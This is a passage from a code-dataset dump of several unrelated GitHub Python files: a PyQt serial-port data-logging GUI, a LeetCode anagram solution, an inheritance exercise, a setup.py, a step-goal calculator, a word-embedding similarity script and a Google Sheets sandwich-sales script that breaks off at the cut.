t_data_array[0]\r\n\t\tself.data_array[1] = t_data_array[1]\r\n\t\tself.data_array[2] = t_data_array[2]\r\n\t\tself.data_array[3] = t_data_array[3]\r\n\t\tself.data_array[4] = t_data_array[4]\r\n\t\tself.data_array[5] = t_data_array[5]\r\n\t\tself.data_array[6] = t_data_array[6]\r\n\t\tself.data_array[7] = t_data_array[7]\r\n\t\tself.data_array[8] = t_data_array[8]\r\n\t\tself.data_array[9] = self.slave_crc16_lo\r\n\t\tself.data_array[10] = self.slave_crc16_hi\r\n\t\tself.data_bytearray = bytearray(self.data_array)\r\n\t\tprint(self.data_bytearray)\r\n\t\tself.ser.write(self.data_bytearray)\t\r\n\r\n\tdef on_get_current_path(self):\r\n\t\treturn(os.path.dirname(os.path.abspath(__file__)))\t\r\n\tdef on_save_to_file(self):\r\n\t\t#self.data_to_file(strftime(\"%Y-%m-%d_%Hh%Mm%Ss\", gmtime()))\t\r\n\t\tself.data_to_file_microphone(strftime(\"%Y-%m-%d_%Hh%Mm%Ss\", gmtime()))\r\n\tdef data_to_file(self, name = \"milk_data\"):\r\n\t\tself.file_description = self.description_widget.toPlainText()\r\n\t\tself.file_x_ax = self.x_ax\r\n\t\tself.file_data_ch1 = self.trace1\r\n\t\tself.file_data_ch2 = self.trace2\r\n\t\tself.file_data_pressure = self.trace3\r\n\t\tdict_to_save = {'description':self.file_description, 'CH1':self.file_data_ch1,'CH2':self.file_data_ch2, 'Pressure':self.file_data_pressure, 'Time': self.file_x_ax}\r\n\t\tdict_filename = 
\"{}\\\\milk_{}.npy\".format(os.path.dirname(os.path.abspath(__file__)),name)\r\n\t\tfilename = \"{}\\\\milk_{}.dat\".format(os.path.dirname(os.path.abspath(__file__)),name)\r\n\t\ttry:\r\n\t\t\tnp.save(dict_filename, dict_to_save)\r\n\t\t\tself.log_widget.appendPlainText(\"[{}] file succesful save\".format(strftime(\"%H:%M:%S\")))\r\n\t\texcept Exception:\r\n\t\t\tself.log_widget.appendPlainText(\"[{}] {}\".format(strftime(\"%H:%M:%S\"), traceback.format_exc()))\t\r\n\tdef data_to_file_microphone(self, name = \"milk_data\"):\r\n\t\tself.file_description = self.description_widget.toPlainText()\r\n\t\tself.file_data_ch1 = self.data_to_storage\t\t\r\n\t\tdict_to_save = {'description':self.file_description, 'DATA':self.file_data_ch1}\r\n\t\tdict_filename = \"{}\\\\milk_microphone_{}.npy\".format(os.path.dirname(os.path.abspath(__file__)),name)\r\n\t\ttry:\r\n\t\t\tnp.save(dict_filename, dict_to_save)\r\n\t\t\tself.log_widget.appendPlainText(\"[{}] file succesful save\".format(strftime(\"%H:%M:%S\")))\r\n\t\texcept Exception:\r\n\t\t\tself.log_widget.appendPlainText(\"[{}] {}\".format(strftime(\"%H:%M:%S\"), traceback.format_exc()))\t\t\t\t\r\n\tdef on_load_from_file(self):\r\n\t\tfname = QFileDialog.getOpenFileName(self, 'Open file', '{}/'.format(self.on_get_current_path()))[0]#/home\r\n\t\tself.log_widget.appendPlainText(\"[{}] {}\".format(strftime(\"%H:%M:%S\"), fname))\t\r\n\t\tif fname:\r\n\t\t\ttry:\r\n\t\t\t\tfilename, file_extension = os.path.splitext(fname)\r\n\t\t\t\tif file_extension == \".BIN\" or file_extension == \".bin\":\r\n\t\t\t\t\tself.log_widget.appendPlainText(\"[{}] file succesful load\".format(strftime(\"%H:%M:%S\")))\r\n\t\t\t\t\tself.graph.clear()\r\n\t\t\t\t\tself.graph_pressure.clear()\r\n\t\t\t\t\tdata_raw = np.fromfile(fname, dtype = np.uint8)\r\n\t\t\t\t\tdata_u16 = list()\r\n\r\n\t\t\t\t\tfor i in range(int(len(data_raw)/2)):\r\n\t\t\t\t\t\tdata_u16.append((data_raw[2*i+1]<<8)+(data_raw[2*i]))\r\n\t\t\t\t\tself.trace1 = np.empty(int(len(data_u16)/2))\r\n\t\t\t\t\tself.trace2 = np.empty(int(len(data_u16)/2))\r\n\t\t\t\t\tfor i in range(int(len(data_u16)/2)):\r\n\t\t\t\t\t\tself.trace1[i] = (data_u16[2*i])\r\n\t\t\t\t\t\tself.trace2[i] = (data_u16[2*i+1])\r\n\t\t\t\t\tself.x_ax = np.linspace(0,1,int(len(data_u16)/2))\r\n\t\t\t\t\tself.curve1 = self.graph.plot(self.x_ax,self.trace1, pen = pg.mkPen('g', width = 3), symbol = 'o', symbolSize = 4)\r\n\t\t\t\t\tself.curve2 = self.graph.plot(self.x_ax,self.trace2, pen = pg.mkPen('y', width = 3), symbol = 'o', symbolSize = 4)\r\n\t\t\t\telse:\r\n\t\t\t\t\t#self.log_widget.appendPlainText(\"[{}] wrong file type\".format(strftime(\"%H:%M:%S\")))\r\n\t\t\t\t\tdata_dict = np.load(fname, allow_pickle=True)\r\n\t\t\t\t\tself.file_description = \"\"\r\n\t\t\t\t\tself.file_data_ch1 = np.empty(0)\r\n\t\t\t\t\tself.file_data_ch2 = np.empty(0)\r\n\t\t\t\t\tself.file_data_pressure = np.empty(0)\r\n\t\t\t\t\tself.file_data_microphone = np.empty(0)\r\n\t\t\t\t\tdata_items = data_dict.item()\r\n\r\n\t\t\t\t\tfile_type = 'MILK_PHOTODIODE'\r\n\t\t\t\t\tfor key in data_items.keys():\r\n\t\t\t\t\t\tif key == 'DATA':\r\n\t\t\t\t\t\t\tfile_type = 'MILK_MICROPHONE'\r\n\t\t\t\t\tif file_type == 'MILK_MICROPHONE':\r\n\t\t\t\t\t\tself.graph_pressure.clear()\r\n\t\t\t\t\t\tself.file_data_microphone = data_items['DATA']\r\n\t\t\t\t\t\tself.file_description = data_items['description']\r\n\t\t\t\t\t\tself.description_widget.clear()\r\n\t\t\t\t\t\tself.description_widget.appendPlainText(self.file_description)\t\t\t\t\t\t\r\n\t\t\t\t\t\tx_axio = 
np.linspace(0,len(self.file_data_microphone)-1, len(self.file_data_microphone))\r\n\t\t\t\t\t\tself.curve = self.graph_pressure.plot(x_axio,self.file_data_microphone, pen = pg.mkPen('w', width = 3), symbol = 'o', symbolSize = 4)\r\n\t\t\t\t\t\tself.log_widget.appendPlainText(\"[{}] file succesful load[microphone]\".format(strftime(\"%H:%M:%S\")))\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tself.graph.clear()\r\n\t\t\t\t\t\tself.graph_pressure.clear()\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\tself.file_description = data_items['description']\r\n\t\t\t\t\t\tself.file_data_ch1 = data_items['CH1']\r\n\t\t\t\t\t\tself.file_data_ch2 = data_items['CH2']\r\n\t\t\t\t\t\tself.file_data_pressure = data_items['Pressure']\t\r\n\t\t\t\t\t\tself.file_x_ax = data_items['Time']\r\n\t\t\t\t\t\tself.data_download_done = 1\r\n\r\n\t\t\t\t\t\tself.description_widget.clear()\r\n\t\t\t\t\t\tself.description_widget.appendPlainText(self.file_description)\r\n\r\n\t\t\t\t\t\tself.trace1 = self.file_data_ch1\r\n\t\t\t\t\t\tself.trace2 = self.file_data_ch2\r\n\t\t\t\t\t\tself.trace3 = self.file_data_pressure\r\n\t\t\t\t\t\tself.x_ax = self.file_x_ax\r\n\r\n\t\t\t\t\t\tself.curve1 = self.graph.plot(self.x_ax,self.trace1, pen = pg.mkPen('g', width = 3), symbol = 'o', symbolSize = 4)\r\n\t\t\t\t\t\tself.curve2 = self.graph.plot(self.x_ax,self.trace2, pen = pg.mkPen('y', width = 3), symbol = 'o', symbolSize = 4)\r\n\t\t\t\t\t\tself.curve3 = self.graph_pressure.plot(self.x_ax,self.trace3, pen = pg.mkPen('r', width = 3), symbol = 'o', symbolSize = 4)\r\n\r\n\t\t\t\t\t\tself.btn_save.setDisabled(False)\r\n\t\t\t\t\t\tself.log_widget.appendPlainText(\"[{}] file succesful load[photodiodes]\".format(strftime(\"%H:%M:%S\")))\r\n\t\t\texcept:\r\n\t\t\t\tself.log_widget.appendPlainText(\"[{}] file load failed\".format(strftime(\"%H:%M:%S\")))\t\r\n\t\t\t\tself.log_widget.appendPlainText(\"[{}] {}\".format(strftime(\"%H:%M:%S\"), traceback.format_exc()))\t\t\t\t\t\t\r\n\tdef on_interrupted(self):\r\n\t\tself.meas_thread.running = False\r\n\t\t\r\n\tdef on_display_record(self):\r\n\t\tself.graph.clear()\r\n\t\tself.record_number = self.current_row + 1\r\n\t\tself.cursor_trigger = 0\r\n\t\tself.xpos = 0\r\n\t\tself.ypos = 0\r\n\t\t#self.label_cord.setText(\"X pos: {:03d} Y pos: {:04d} Time: {:0.2f}sec\".format(self.xpos, self.ypos, self.xpos*self.record_sampling_time))\r\n\t\t#self.graph.enableAutoRange(ViewBox.YAxis, enable=False)\r\n\t\t#self.graph.enableAutoRange(ViewBox.XAxis, enable=True)\r\n\t\tself.graph.showGrid(1,1,1)\r\n\t\tself.graph.addItem(self.vLine, ignoreBounds=True)\r\n\t\tself.graph.addItem(self.hLine, ignoreBounds=True)\t\r\n\t\tself.plot_xaxis = list()\r\n\t\tfor i in range(len(self.parsed_data_list[self.current_row])):\r\n\t\t\tself.plot_xaxis.append(i*self.record_sampling_time)\r\n\r\n\t\tself.curve = self.graph.plot(self.plot_xaxis,self.parsed_data_list[self.current_row], pen = pg.mkPen('g', width = 3), symbol = 'o', symbolSize = 10, title = \"Record №{}\".format(self.record_number))\r\n\t\tself.curve.curve.setClickable(True)\r\n\r\n\t\tself.curve.sigPointsClicked.connect(self.clicked_point)\t\r\n\r\n\tdef closeEvent(self, event):#перехватываем событие закрытия приложения\r\n\t\tresult = QtWidgets.QMessageBox.question(self, \"Подтверждение закрытия окна\", \"Вы действительно хотите закрыть окно?\", QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No, QtWidgets.QMessageBox.No )\r\n\t\tif result == QtWidgets.QMessageBox.Yes:\r\n\t\t\tself.hide()\r\n\t\t\t#self.pwindow.close()\r\n\t\t\tself.meas_thread.running = 
False\r\n\t\t\tself.meas_thread.wait(5000)#ms\r\n\t\t\tevent.accept()\r\n\t\telse:\r\n\t\t\tevent.ignore()\r\n\t\t\r\n\tdef clicked_point(self, plot, points):\r\n\t\tglobal lastClicked\r\n\t\tif self.last_clicked_plot == self.current_row:\r\n\t\t\ttry:\r\n\t\t\t\tfor p in self.lastClicked:\r\n\t\t\t\t\tp.resetPen()\r\n\t\t\texcept:\r\n\t\t\t\tpass\r\n\t\tif self.last_clicked_plot != self.current_row:\r\n\t\t\tself.cursor_trigger = 0\r\n\t\tif self.cursor_trigger == 0:\r\n\t\t\tself.xpos = int(points[0].pos()[0]/self.record_sampling_time)\r\n\t\t\tself.ypos = int(points[0].pos()[1])\r\n\t\t\t#self.label_cord.setText(\"X pos: {:03d} Y pos: {:04d} Time: {:0.2f}sec\".format(self.xpos, self.ypos, self.xpos*self.record_sampling_time))\r\n\r\n\t\t\tfor p in points:\r\n\t\t\t\tp.setPen(pg.mkPen(color='r', width=4)) #'r', width=5)\r\n\t\tself.lastClicked = points\r\n\t\tself.last_clicked_plot = self.current_row\t\r\n\t\tself.cursor_trigger += 1\r\n\t\tif self.cursor_trigger >= 2:\r\n\t\t\tself.cursor_trigger = 0\r\n\r\n\t\tself.vLine.setPos(points[0].pos()[0])\r\n\t\ttry:\r\n\t\t\tself.hLine.setPos(self.parsed_data_list[self.current_row][self.xpos])\r\n\t\texcept:\r\n\t\t\tpass#print(\"x pos out of range\")\r\n\tdef crc16(self, data: bytes, poly=0xa001):\r\n\t '''\r\n\t CRC-16-CCITT Algorithm\r\n\t '''\r\n\t data = bytearray(data)\r\n\t crc = 0xFFFF\r\n\t for b in data:\r\n\t cur_byte = 0xFF & b\r\n\t for _ in range(0, 8):\r\n\t if (crc & 0x0001) ^ (cur_byte & 0x0001):\r\n\t crc = (crc >> 1) ^ poly\r\n\t else:\r\n\t crc >>= 1\r\n\t cur_byte >>= 1\r\n\t crc = (~crc & 0xFFFF)\r\n\t crc = (crc << 8) | ((crc >> 8) & 0xFF)\r\n\t \r\n\t return crc & 0xFFFF\t\t\t\r\n\tdef calcByte(self, ch, crc):\r\n\t \"\"\"Given a new Byte and previous CRC, Calc a new CRC-16\"\"\"\r\n\t if type(ch) == type(\"c\"):\r\n\t by = ord( ch)\r\n\t else:\r\n\t by = ch\r\n\t crc = (crc >> 8) ^ self.table[(crc ^ by) & 0xFF]\r\n\t return (crc & 0xFFFF)\r\n\r\n\tdef calcString(self, st, crc):\r\n\t \"\"\"Given a binary string and starting CRC, Calc a final CRC-16 \"\"\"\r\n\t for ch in st:\r\n\t crc = (crc >> 8) ^ self.table[(crc ^ (ch)) & 0xFF] #ord(ch) \r\n\t return crc\r\nclass evThread(QtCore.QThread):\r\n\t\r\n\tstatus_signal = QtCore.pyqtSignal(str)\r\n\tdataplot = QtCore.pyqtSignal(int)\r\n\tprogress = QtCore.pyqtSignal(int)\r\n\tdataplot_array = QtCore.pyqtSignal(list)\r\n\r\n\tdef __init__(self, parent = None):\r\n\t\tQtCore.QThread.__init__(self,parent)\r\n\t\tself.running = False\r\n\t\tself.ComPort = str\r\n\t\tself.data = 0\r\n\t\tself.data_array = list()\r\n\t\t\r\n\tdef run(self):\r\n\t\tself.running = True\r\n\t\twhile self.running == True:\r\n\t\t\tif self.running == True:\r\n\t\t\t\tself.data_array = list()\r\n\t\t\t\tfor i in range(1000):\r\n\t\t\t\t\tself.data = int.from_bytes((self.ser.read(1)), byteorder='big', signed=False)#100*np.random.random(1)#\r\n\t\t\t\t\tself.data_array.append(self.data)\r\n\t\t\t\tself.dataplot_array.emit(self.data_array)\r\n\t\t\t\tself.status_signal.emit(\"in progress\")\r\n\t\t\tif self.running == False:\r\n\t\t\t\tself.status_signal.emit(\"Interrupted\")\r\n\r\n\tdef on_connected(self, comport):\r\n\t\ttry:\r\n\t\t\tself.ComPort = comport\r\n\t\t\tself.ser = serial.Serial(self.ComPort, baudrate=921600, bytesize=serial.EIGHTBITS,\r\n\t\t\t\t\t\t\t\t\t parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, timeout = 0.01)\r\n\t\t\tself.ser.isOpen() # try to open port\r\n\t\t\tself.serialDeviceConnected = True\r\n\t\texcept IOError:\r\n\t\t\tprint(\"Port already open another 
program\")\r\n\t\texcept serial.SerialException:\r\n\t\t\tprint(\"SerialException\")\r\n\t\t\t#self.log_widget.appendPlainText(\"[{}] SerialException\".format(strftime(\"%H:%M:%S\")))\r\n\t\t#except Exception:\r\n\t\t\t#print(\"Unexpected error, Null ComName\")\r\n\t\t\t#self.log_widget.appendPlainText(\"[{}] unexpected error\".format(strftime(\"%H:%M:%S\")))\r\n\tdef on_disconnected(self):\r\n\t\tself.serialDeviceConnected = False\r\n\t\t#self.log_widget.appendPlainText(\"[{}] Disconnected\".format(strftime(\"%H:%M:%S\")))\r\n\t\ttry:\r\n\t\t\tself.ser.close()\r\n\t\texcept:\r\n\t\t\tprint(\"serial port close exception, on_disconnect --traceback\")\r\n\t\t\t#self.log_widget.appendPlainText(\"[{}] error, device session lost\".format(strftime(\"%H:%M:%S\")))\r\n\r\n\r\nclass ppData:\r\n\t\"\"\"this class will be used for post-processing of data\"\"\"\r\n\tdef __init__(self, parent = None):\r\n\t\tself.dataFromFile = []\r\n\r\n\r\ndef serial_ports():\r\n\t\"\"\" Lists serial port names\r\n\t\t:raises EnvironmentError:\r\n\t\t\tOn unsupported or unknown platforms\r\n\t\t:returns:\r\n\t\t\tA list of the serial ports available on the system\r\n\t\"\"\"\r\n\tif sys.platform.startswith('win'):\r\n\t\tports = ['COM%s' % (i + 1) for i in range(256)]\r\n\telif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):\r\n\t\t# this excludes your current terminal \"/dev/tty\"\r\n\t\tports = glob.glob('/dev/tty[A-Za-z]*')\r\n\telif sys.platform.startswith('darwin'):\r\n\t\tports = glob.glob('/dev/tty.*')\r\n\telse:\r\n\t\traise EnvironmentError('Unsupported platform')\r\n\r\n\tresult = []\r\n\tfor port in ports:\r\n\t\ttry:\r\n\t\t\ts = serial.Serial(port)\r\n\t\t\ts.close()\r\n\t\t\tresult.append(port)\r\n\t\texcept (OSError, serial.SerialException):\r\n\t\t\tpass\r\n\treturn result\r\n\r\ndef resource_path(relative_path):\r\n    \"\"\" Get absolute path to resource, works for dev and for PyInstaller \"\"\"\r\n    try:\r\n        # PyInstaller creates a temp folder and stores path in _MEIPASS\r\n        base_path = sys._MEIPASS\r\n    except Exception:\r\n        base_path = os.path.abspath(\".\")\r\n\r\n    return os.path.join(base_path, relative_path)\r\n\r\nif __name__ == '__main__':\r\n\tapp = QtWidgets.QApplication(sys.argv)\r\n\tex = CommonWindow()\r\n\tex.setFont(QtGui.QFont('Arial', 9))#, QtGui.QFont.Bold\r\n\tex.setWindowTitle(\"Milk fetch ver 1.0.0\")\r\n\t#app.setStyle('Fusion')\r\n\tapp.setStyleSheet(qdarkstyle.
load_stylesheet())\r\n\t#ex.setWindowFlags(ex.windowFlags() | QtCore.Qt.FramelessWindowHint)\r\n\tex.comport_combo.addItems(serial_ports())\r\n\t#ex.setFixedSize(500,400)\r\n\t#ex.resize(300,200)\r\n\tex.adjustSize()\r\n\t#ico = QtGui.QIcon(\"icon.png\")\r\n\t#ex.setWindowIcon(ico)#icon for window only\r\n\t#app.setWindowIcon(ico)#icon for application\r\n\t#if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):\r\n #  \tQtGui.QApplication.instance().exec_()\r\n\tex.show()\r\n\tsys.exit(app.exec_())  # run the event-processing loop\r\n","repo_name":"LittleHorus/CommonRep","sub_path":"MilkFetch.py","file_name":"MilkFetch.py","file_ext":"py","file_size_in_byte":33028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"41076861683","text":"from collections import defaultdict\nfrom typing import List\n\n\nclass Solution:\n    def groupAnagrams(self, strs: List[str]) -> List[List[str]]:\n        sol = defaultdict(list)\n        for word in strs:\n            letters = [0] * 26\n            for ch in word:\n                letters[ord(ch) - ord('a')] += 1  # anagrams share the same letter counts\n            sol[tuple(letters)].append(word)\n        return list(sol.values())\n","repo_name":"anna-helena/LeetCode","sub_path":"0049-group-anagrams/0049-group-anagrams.py","file_name":"0049-group-anagrams.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"41452463693","text":"class partyAnimal:\n\tx = 0\n\tname = \"\"\n\tdef __init__(self, name):\n\t\tself.name = name\n\t\tprint(\"i am constructed, my name is\", name)\n\n\tdef party(self):\n\t\tself.x = self.x + 1\n\t\tprint(\"x val:\", self.x)\n\n\tdef __del__(self):\n\t\tprint(self.name, \"is destructed, x is\", self.x)\n\n\nclass FootballFan(partyAnimal):\n\tpoints = 0\n\tdef touchDown(self):\n\t\tself.points = self.points + 7\n\t\tself.party()\n\t\tprint(self.name, \"points:\", self.points)\n\nobj1 = partyAnimal(\"Sudesh\")\nobj2 = partyAnimal(\"Madu\")\n\nobj1.party()\nobj1.party()\nobj2.party()","repo_name":"sudeshm99/Python-Specialization-Repo","sub_path":"inheritance.py","file_name":"inheritance.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"27688392810","text":"from __future__ import print_function\nfrom setuptools import setup\nfrom build_utils import BuildCommand\nfrom build_utils import PublishCommand\nfrom build_utils import BinaryDistribution\n\n\nPACKAGE_NAME = 'flask_pycreate2'\nVERSION = '0.0.1'\nBuildCommand.pkg = PACKAGE_NAME\nPublishCommand.pkg = PACKAGE_NAME\nPublishCommand.version = VERSION\n\n\nsetup(\n\tauthor='Isaac Tan',\n\tauthor_email='',\n\tname=PACKAGE_NAME,\n\tversion=VERSION,\n\tdescription='A library to control mBot Ranger robots using Python Flask to provide a Web API for invoking the pycreate2 package developed by Kevin Walchko',\n\turl='http://github.com/isaactps/{}'.format(PACKAGE_NAME),\n\tclassifiers=[\n\t\t'Development Status :: 4 - Beta',\n\t\t'Intended Audience :: Developers',\n\t\t'License :: OSI Approved :: MIT License',\n\t\t'Operating System :: POSIX :: Linux',\n\t\t'Programming Language :: Python :: 3.6',\n\t\t'Topic :: Software Development :: Libraries',\n\t\t'Topic :: Software Development :: Libraries :: Python Modules',\n\t\t'Topic :: Software Development :: Libraries :: Application Frameworks'\n\t],\n\tlicense='MIT',\n\tkeywords=['mBot Ranger', 'pycreate2', 'api', 'flask', 'library', 'robotics', 
'robot'],\n\tpackages=[PACKAGE_NAME],\n\tinstall_requires=open('requirements.txt').read().splitlines(),\n\tscripts=[]\n)\n","repo_name":"isaactps/Yoshimi","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"38720316768","text":"from step_up.database import get_database\n\n\ndef steps_calculator(userid):\n    # Get a handle on the DB\n    database = get_database()\n    # Get info from the database\n    user_info = database.execute(\n        \"SELECT sex, current_weight, target_weight, body_fat_per FROM user WHERE userid = ?\", (userid,)\n    ).fetchone()\n\n    sex = user_info['sex']\n    current_weight = user_info['current_weight']\n    target_weight = user_info['target_weight']\n    body_fat_per = user_info['body_fat_per']\n\n    # convert pounds to kilograms (divide by 2.205)\n    current_weight_kg = current_weight / 2.205\n    # calculates the current fat mass\n    current_fat_mass = (body_fat_per * 0.01) * current_weight_kg\n    # converts the target weight loss percentage into kilograms\n    target_weight_loss = current_weight_kg * (target_weight * .01)\n    # target weight in kg\n    target_body_weight = current_weight_kg - target_weight_loss\n    # temporary new fat mass\n    new_fat_mass = current_fat_mass - target_weight_loss\n    # target body fat percentage\n    target_body_fat = (new_fat_mass / target_body_weight) * 100\n    # Holding for later... current_fat_free_mass = current_weight_kg - current_fat_mass\n\n    if sex == 'female':\n        power_regression = 261425.4 / (target_body_fat ** 1.8797)\n        daily_steps = power_regression * current_fat_mass\n    else:\n        power_regression = 39377.34 / (target_body_fat ** 1.3405)\n        daily_steps = power_regression * current_fat_mass\n\n    daily_steps = int(daily_steps)  # truncate to a whole number of steps before storing\n\n    # Add the value to the database\n    database.execute(\n        \"UPDATE user SET steps = ? 
WHERE userid = ?\", (daily_steps, userid))\n database.commit()\n\n\ndef get_steps(userid):\n # Get a handle on the db\n database = get_database()\n\n # Get current steps\n step = database.execute(\n \"Select steps FROM user where userid = ?\", (userid,)\n ).fetchone()\n\n steps = int(step['steps'])\n\n # if steps == 0:\n # steps = \"Click on 'Survey' to calculate your steps!\"\n\n return steps\n\n\ndef get_user(userid):\n database = get_database()\n user = database.execute(\n \"Select * FROM user where userid = ?\", (userid,)\n ).fetchone()\n return user\n","repo_name":"KSU-Capstone-Team-2/StepUp","sub_path":"step_up/formula.py","file_name":"formula.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"74458750336","text":"import config\nimport fasttext\nimport numpy as np\nimport pandas as pd\nfrom annoy import AnnoyIndex\nfrom gensim.models import KeyedVectors\nfrom scipy.spatial import cKDTree\nfrom tqdm import tqdm\n\n# ============================================================\n# Script purpose:\n# Use nearest-neighbor word embeddings to find suggested words\n# ============================================================\n\n# number of nearest-neighbor words to save\nNUM_NEAREST = 16\n\n# python reduce_model.py ./data/raw/cc.zh.300.bin 100\n# zh_model = fasttext.load_model(\"./data/raw/cc.zh.100.bin\")\ntencent_vectors = KeyedVectors.load(\"data/intermediate/tencent_vectors\", mmap=\"r\")\nvocab = set(tencent_vectors.wv.vocab.keys())\n\ncedict = pd.read_csv(f\"./data/intermediate/cedict.txt\", sep=\"\\t\", index_col=0)\n\n# unify simplified+traditional words\nwords = list(set(cedict[\"simplified\"]) | set(cedict[\"traditional\"]))\n\n# compute embeddings\nembedded_words = []\nword_index = 0\n\nnn_index = AnnoyIndex(200, \"angular\")\n\nprint(\"Constructing nn index\")\nfor word in tqdm(words):\n if word in vocab:\n word_embedding = tencent_vectors.wv.word_vec(word)\n\n nn_index.add_item(word_index, word_embedding)\n embedded_words.append(word)\n\n word_index += 1\n\nnn_index.build(256)\n\nnearest_indices = []\nnearest_dists = []\n\nprint(\"Retrieving nearest neighbors\")\nfor word_idx, word in tqdm(enumerate(embedded_words), total=len(embedded_words),):\n indices, dists = nn_index.get_nns_by_item(\n word_idx, n=NUM_NEAREST + 1, include_distances=True\n )\n\n # remove query itself\n indices = indices[1:]\n dists = dists[1:]\n\n nearest_indices.append(indices)\n nearest_dists.append(dists)\n\n# convert embedding distances and nearest-words to dataframe\nprint(\"Exporting results\")\nembeddings_dists = pd.DataFrame(nearest_dists, index=embedded_words)\nembeddings_nearest = pd.DataFrame(nearest_indices, index=embedded_words)\nembeddings_nearest = embeddings_nearest.applymap(lambda x: embedded_words[x])\n\nembeddings_dists.to_hdf(\n \"./data/intermediate/embeddings_dists.h5\",\n key=\"embeddings_dists\",\n complevel=config.HDF_COMPLEVEL,\n complib=config.HDF_COMPLIB,\n mode=\"w\",\n)\n\nembeddings_nearest.to_hdf(\n \"./data/intermediate/embeddings_nearest.h5\",\n key=\"embeddings_nearest\",\n complevel=config.HDF_COMPLEVEL,\n complib=config.HDF_COMPLIB,\n mode=\"w\",\n)\n","repo_name":"kevinhu/hotpot","sub_path":"dictionary/7_word2vec_similars.py","file_name":"7_word2vec_similars.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"7662079870","text":"# Write your code to expect a 
terminal of 80 characters wide and 24 rows high\nimport gspread\nfrom google.oauth2.service_account import Credentials\n\nSCOPE = [\n    \"https://www.googleapis.com/auth/spreadsheets\",\n    \"https://www.googleapis.com/auth/drive.file\",\n    \"https://www.googleapis.com/auth/drive\"\n    ]\n\nCREDS = Credentials.from_service_account_file('creds.json')\nSCOPED_CREDS = CREDS.with_scopes(SCOPE)\nGSPREAD_CLIENT = gspread.authorize(SCOPED_CREDS)\nSHEET = GSPREAD_CLIENT.open('love_sandwiches')\n\n\ndef get_sales_data():\n    \"\"\"\n    Get sales figures input from the user.\n    Run a while loop to collect a valid string of data from the user via\n    the terminal, which must be a string of 6 numbers separated by commas. The\n    loop will repeatedly request data until it is valid.\n    \"\"\"\n    while True:\n        print('Please enter sales data from the most recent market!')\n        print('Data should consist of six numbers, separated by commas...')\n        print('e.g. 10,20,30,40,50,60\\n')\n\n        data_str = input('Enter your data here:\\n')\n        sales_data = data_str.split(',')\n\n        if validate_data(sales_data):\n            print('Data is valid!')\n            break\n\n    return sales_data\n\n\ndef validate_data(values):\n    \"\"\"\n    Inside the try clause, converts all string values into integers.\n    Raises a ValueError if strings can't be converted into integers,\n    or if there aren't exactly 6 values...\n    \"\"\"\n    try:\n        [int(value) for value in values]\n        if len(values) != 6:\n            raise ValueError(\n                f'Exactly 6 values are required - you provided {len(values)}'\n            )\n    except ValueError as e:\n        print(f'Invalid data entered: {e}, please try again!\\n')\n        return False\n\n    return True\n\n\n# def update_sales_worksheet(data):\n#     \"\"\"\n#     Update sales worksheet, add new row with the user list data provided\n#     \"\"\"\n#     print('Updating sales worksheet...\\n')\n#     sales_worksheet = SHEET.worksheet('sales')\n#     sales_worksheet.append_row(data)\n#     print('Sales worksheet updated successfully!...\\n')\n\n\n# def update_surplus_worksheet(data):\n#     \"\"\"\n#     Update surplus worksheet, add new row with the surplus\n#     sandwich quantities\n#     calculated\n#     \"\"\"\n#     print('Updating surplus worksheet...\\n')\n#     surplus_worksheet = SHEET.worksheet('surplus')\n#     surplus_worksheet.append_row(data)\n#     print('Surplus worksheet updated successfully!...\\n')\n\n\n# NB: Refactored utility fn instead of the two very similar fns above\ndef update_worksheet(data, worksheet):\n    \"\"\"\n    Receive a list of integers to be inserted into a designated worksheet.\n    Update the relevant worksheet of the love_sandwiches spreadsheet with the\n    data provided\n    \"\"\"\n    print(f'Updating {worksheet} worksheet...\\n')\n    worksheet_to_be_updated = SHEET.worksheet(worksheet)\n    worksheet_to_be_updated.append_row(data)\n    print(f'{worksheet} worksheet updated successfully!...\\n')\n\n\ndef calculate_surplus_sandwiches(data):\n    \"\"\"\n    Compare sales with stock and calculate surplus for each sandwich type...\n    Surplus = stock - sales for that particular sandwich\n    - Positive surplus indicates waste\n    - Negative surplus indicates extra sandwiches made when stock was sold out\n    \"\"\"\n    print('Calculating surplus sandwiches...\\n')\n    stock = SHEET.worksheet('stock').get_all_values()\n    stock_row = stock[-1]\n    surplus_data = []\n    for stock_value, sales_value in zip(stock_row, data):\n        surplus = int(stock_value) - sales_value\n        surplus_data.append(surplus)\n    return surplus_data\n\n\ndef get_last_five_sales_entries():\n    \"\"\"\n    Collect columns of data from the sales worksheet, taking the last\n    five entries for each sandwich, and return the data as a list of lists\n    \"\"\"\n    sales_worksheet = SHEET.worksheet('sales')\n    list_of_last_fives = []\n    for num in range(1, 7):\n        col = sales_worksheet.col_values(num)\n        last_five = col[-5:]\n        list_of_last_fives.append(last_five)\n\n    return list_of_last_fives\n\n\ndef get_average_sales(data):\n    \"\"\"\n    Calculate average sales data (+10%) for each sandwich type\n    \"\"\"\n    print(\"Calculating stock data...\\n\")\n    avg_sales = []\n    for column in data:\n        int_list_avg = sum(int(item) for item in column) / len(column)\n        avg_plus_extra = round(int_list_avg * 1.1)\n        avg_sales.append(avg_plus_extra)\n\n    return avg_sales\n\n\ndef main():\n    \"\"\"\n    All main fn calls go here...\n    \"\"\"\n    data = get_sales_data()\n    sales_data = [int(num) for num in data]\n    update_worksheet(sales_data, 'sales')\n    new_surplus_data = calculate_surplus_sandwiches(sales_data)\n    update_worksheet(new_surplus_data, 'surplus')\n    list_of_last_five_sales = 